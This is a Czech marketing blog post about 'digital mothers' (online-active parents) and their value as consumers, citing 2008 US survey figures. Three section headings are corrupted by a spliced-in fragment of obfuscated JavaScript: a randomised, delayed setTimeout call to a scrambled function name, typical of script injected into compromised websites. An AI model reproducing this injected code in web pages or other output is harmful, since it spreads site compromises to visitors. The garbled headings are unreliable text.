Kdo jsou “digitální matky” a jaký význam mají pro můj business? Copy

Většina z nás má minimálně jednu ve svém blízkém okolí a přesto možná nevíte, že se jedná o velmi specifický druh. Říká se jim digitální matky. Že vám tento pojem nic neříká? V tom případě je nejvyšší čas to změnit, protože rostoucí počet tzv. digitálních matek a jejich rostoucí síla (nákupní i přesvědčovací) bude jedním z výrazných trendů pro příštích pár let i v naší republice.

V západní Evropě a v USA si potenciál digitálních matek pro trh už uvědomili. Aby marketéři tyto ženy lépe pochopili, vzniklo několik studií, které se zabývaly chováním digitálních matek a jejich vztahem k novým technologiím.

Stručná charakteristikaandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Kdo jsou ty digitální matky? Jsou to ženy z generace husákových dětí, které byly online v podstatě celý svůj dospělý život a tuto zkušenost promítají do svého partnersého života i rodičovství. Mají alespoň jedno dítě mladší 18 let a v průběhu 3 měsíců využijí alespoň dva typy technologií patřících do Web 2.0 kategorie.

Typické situace ze života digitální matkyandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Zjistí, že je těhotná a každý týden sleduje vývoj svého dítěte na online portálech pro maminky. Případně ke stejnému účelu využívá aplikace v chytrém telefonu.

Výbavu pro dítě nakupuje zásadně online, a to po pečlivém porovnání cen (jak jinak než online) a pročtení nespočet uživatelských recenzí od ostatních maminek. Je tak schopna pořídit i kočárek, nebo například “chůvičku”, aniž by musela rozumět technickým specifikacím. Reálné zkušenosti ostatních maminek na webu jim pro vytvoření si vlastního názoru bohatě stačí.

Chystá se s dítětem na první očkování, a ještě než dorazí do ordinace, z Internetu už ví, jak se můžou projevit případné reakce na očkování, co má v takovém případě dělat a aktivně to konzultuje s lékařem. Díky internetu se stává rovnocenným partnerem pro diskuzi s lékařem.

Když chce poradit s výchovou, nevolá své matce, ale vloží dotaz na Facebook, nebo do diskuze jednoho z mnoha online portálů pro ženy a maminky.

V případě nějaké nenadálé situace vše rychle konzultuje s přítelem Googlem a nejlépe pomocí chytrého telefonu, který má za všech okolností při sobě. (Jsou vaše webové stránky optimalizované pro mobilní zařízení? Vyzkoušejte  simulátor pro lepší představu toho, jak působí vaše webové stránky při zobrazení na mobilu. http://www.drosera.cz/simulator-telefonu )

Po nějakém čase se rozhodne, vrátit se k práci na částečný úvazek a začně pracovat z domova, protože současné technologie to umožňují. A tak by se dalo pokračovat….

Digitální matky v číslechandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}

Potenciál online maminek v ČR je zatím opomíjen a na žádnou relevantní studii jsem nenarazila. Budu tedy citovat údaje ze studie, která proběhla v USA v roce 2008. Jelikož jsem i já sama takovou digitální matkou, troufám si říct, že postřehy plynoucí z této studie mohou být poučné i pro český trh.

  • Digitální matky tvoří 40% všech žen online

  • Více se angažují v sociálních sítích a posílání sms zpráv

  • Maminky, které mají děti ve věku 0-4 roky, mnohem více navštěvují rodinné a dětské portály (61%), ale také webové stránky týkající se financí (63%)

  • Jakmile uloží děti do postele, připojují se na Internet, ať už pro zábavu, nebo kvůli svým rodičovským a/nebo pracovním povinnostem, 65% z nich se připojuje na internet v čase mezi 17:30 a 21:00

  • Maminky, které se průzkumu zúčastnily, tráví týdně 18,5 hodiny na Internetu a z toho více než 8 hodin na sociálních sítích.

  • Digitální matky v průzkumu uvedly jako nejcennější tyto zdroje informací: informace od přátel (62,4%), od ostatních spotřebitelů (50,1%) a od expertů v daném oboru (35,8%)

  • Digitální matky aktivně nakupují online. V USA tvoří digitální matky 58% celkových tržeb online obchodů. V Evropě je situace obdobná. Podle Evropské asociace interaktivní reklamy (European Interactive Advertising Association, www.eiaa.net) nakupují digitální matky online častěji než bezdětné ženy. 86% maminek s dětmi ve věku 0-9 let nakupuje online a 75% maminek s dětmi ve věku 10-18 let nakupuje online. Za období 6 měsíců nakoupilo 79% maminek alespoň 10 věcí v celkové hodnotě 644 EUR.

A nezapomeňme na jeden důležitý fakt! Moderní digitální matka se na internet nepřipojuje jen přes počítač. Vždyť kdo jiný, než máma s dítětem visícím u nohy, obědem na sporáku a současně běžící pračkou, by měl k brouzdání po netu a sociálních sítích používat chytré telefony? http://www.drosera.cz/cs/proc-a-jak-delat-mobilni-weby-52

Reference: http://digitalmom.razorfish.com/publication/?m=4248&l=1